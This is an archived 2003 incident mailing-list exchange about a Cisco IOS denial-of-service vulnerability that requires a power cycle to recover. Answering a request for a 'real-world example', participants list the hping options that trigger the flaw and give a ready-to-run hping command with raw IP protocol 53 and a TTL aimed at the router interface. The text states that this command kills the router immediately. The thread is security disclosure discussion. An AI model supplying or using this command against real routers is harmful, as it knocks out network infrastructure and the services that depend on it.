data is not needed nor is file, the payload again is irrelevant. hping <router> -0 -H 53 -t <ttl to router interface> -i u1000 (this will kill it immediately if the ttl is correct) -----Original Message----- From: Richard Johnson [mailto:rdumpat_private] Sent: Sunday, July 20, 2003 4:14 PM To: incidentsat_private Cc: Curt Purdy Subject: RE: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover At 13:58 -0500 on 2003-07-20, Curt Purdy wrote: > Could we have an example of an hping command to invoke this. I have been > playing with it and would like a real-world example, and since there a now > multiple exploits out, this knowledge should not be a problem. Thanks. man hping (or hping2) The options of interest are: -0 --rawip, -n --numeric, (just to avoid dns delays) -c --count {76 or so}, -t --ttl {number of hops to target}, -H --ipproto {53|55|77|103}, -d --data {128 or so is more than enough}, -E --file {/dev/arandom or whatever}, and hostname|IP Richard -- Build a man a fire, and he'll be warm for the night. Set a man on fire, and he'll be warm for the rest of his life. --------------------------------------------------------------------------- ---------------------------------------------------------------------------- --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 08:38:35 PDT